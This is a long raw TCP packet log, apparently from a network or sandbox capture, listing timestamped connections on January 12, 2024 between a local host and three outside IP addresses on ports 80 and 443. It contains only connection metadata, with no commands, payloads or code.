                                                                                                                                                                      Jan 12, 2024 06:47:57.311446905 CET49730443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:47:57.311506987 CET44349730172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:47:57.543593884 CET44349731172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:47:57.543670893 CET49731443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:47:57.543701887 CET44349731172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:47:57.543755054 CET49731443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:47:57.543766022 CET44349731172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:47:57.543807030 CET49731443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:47:57.543814898 CET44349731172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:47:57.543855906 CET44349731172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:47:57.543859005 CET49731443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:47:57.543906927 CET49731443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:47:57.544949055 CET49731443192.168.2.4172.67.139.220
                                                                                                                                                                      Jan 12, 2024 06:47:57.544970036 CET44349731172.67.139.220192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:00.686127901 CET4973280192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:00.686254978 CET4973380192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:00.969156027 CET8049733175.120.254.9192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:00.969485998 CET4973380192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:00.969908953 CET4973380192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:00.971302032 CET8049732175.120.254.9192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:00.971509933 CET4973280192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:00.971760035 CET4973280192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:01.017657995 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:01.178920984 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:01.179240942 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:01.179519892 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:01.251055956 CET8049733175.120.254.9192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:01.251159906 CET4973380192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:01.251403093 CET4973380192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:01.256072044 CET8049732175.120.254.9192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:01.256252050 CET4973280192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:01.256253004 CET4973280192.168.2.4175.120.254.9
                                                                                                                                                                      Jan 12, 2024 06:48:01.394026041 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:01.531085014 CET8049733175.120.254.9192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:01.538846970 CET8049732175.120.254.9192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:01.900572062 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:01.900680065 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:01.901360989 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:01.901424885 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:01.901696920 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:01.901711941 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:01.901751995 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:01.901774883 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.062570095 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.062798977 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.063606977 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.063755989 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.063932896 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.064066887 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.064420938 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.064487934 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.064956903 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.065013885 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.065429926 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.065478086 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.065501928 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.065547943 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.065571070 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.065615892 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.227077961 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.227268934 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.227658987 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.227824926 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.228079081 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.228223085 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.228358030 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.228414059 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.228879929 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.228940964 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.229279041 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.229340076 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.229367971 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.229413033 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.229434967 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.229480028 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.229810953 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.229866982 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.230375051 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.230434895 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.230802059 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.230858088 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.230882883 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.230938911 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.241998911 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.242177963 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.242456913 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.242652893 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.387993097 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.388056040 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.388660908 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.388709068 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.389055014 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.389105082 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.389175892 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.389223099 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.389594078 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.389648914 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.389656067 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.389704943 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.390109062 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.390161037 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.390789032 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.390856028 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.390872955 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.390887022 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.390918016 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.390944958 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.447652102 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.447668076 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.447720051 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.448055029 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.448103905 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.448127985 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.448179007 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.448257923 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.448302984 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.448570967 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.448582888 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.448618889 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.448642969 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.448689938 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.448703051 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.448749065 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.448838949 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.448884964 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.449130058 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.449176073 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.449388981 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.449400902 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.449436903 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.449455976 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.449522972 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.449572086 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.449829102 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.449876070 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.449975014 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.450020075 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.450046062 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.450090885 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.450336933 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.450383902 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.450388908 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.450436115 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.450798988 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.450810909 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.450850010 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.450866938 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.450879097 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.450922966 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.451092005 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.451143026 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.451523066 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.451575041 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.457963943 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.458019018 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.458029032 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.458067894 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.547873020 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.547943115 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.548533916 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.548592091 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.557928085 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.557985067 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.559020042 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.559094906 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.559108973 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.559154987 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.559230089 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.559276104 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.559582949 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.559645891 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.559691906 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.559820890 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.560065031 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.560117006 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.560121059 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.560163021 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.560602903 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.560647964 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.560651064 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.560705900 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.560713053 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.560759068 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.561137915 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.561203003 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.561599016 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.561655045 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.562096119 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.562159061 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.562969923 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.563018084 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.563101053 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.563146114 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.607660055 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.607820988 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.608190060 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.608249903 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.609168053 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.609220982 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.609802008 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.609853983 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.610573053 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.610622883 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.610637903 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.610690117 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.611890078 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.611948013 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.612436056 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.612499952 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.718875885 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.719146013 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.722059965 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.722129107 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.722233057 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.722400904 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.722453117 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.723177910 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.723236084 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.723546028 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.723558903 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.723601103 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.723628044 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.723651886 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.723675966 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.723707914 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.724026918 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.724081993 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.724673986 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.724726915 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.724739075 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.724750996 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.724788904 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.724824905 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.724855900 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.724873066 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.724908113 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.725445986 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.725500107 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.725524902 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.725581884 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.725584984 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.725608110 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.725630045 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.725647926 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.725707054 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.725759029 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.725775003 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.725821972 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.725999117 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.726051092 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.726110935 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.726161003 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.726679087 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.726710081 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.726736069 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.726763964 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.726931095 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.726983070 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.728626013 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.728679895 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.728715897 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.728769064 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.729211092 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.729263067 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.729607105 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.729655981 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.729707956 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.730214119 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.730271101 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.730277061 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.730324984 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.730585098 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.730640888 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.731107950 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.731177092 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.731587887 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.731637001 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.731666088 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.731683016 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.731919050 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.731930971 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.731978893 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.732004881 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.732054949 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.732455969 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.732523918 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.732559919 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.732630968 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.732669115 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.732731104 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.732975006 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.733011961 CET8049734186.147.159.149192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:02.733047962 CET4973480192.168.2.4186.147.159.149
                                                                                                                                                                      Jan 12, 2024 06:48:02.733083010 CET8049734186.147.159.149192.168.2.4
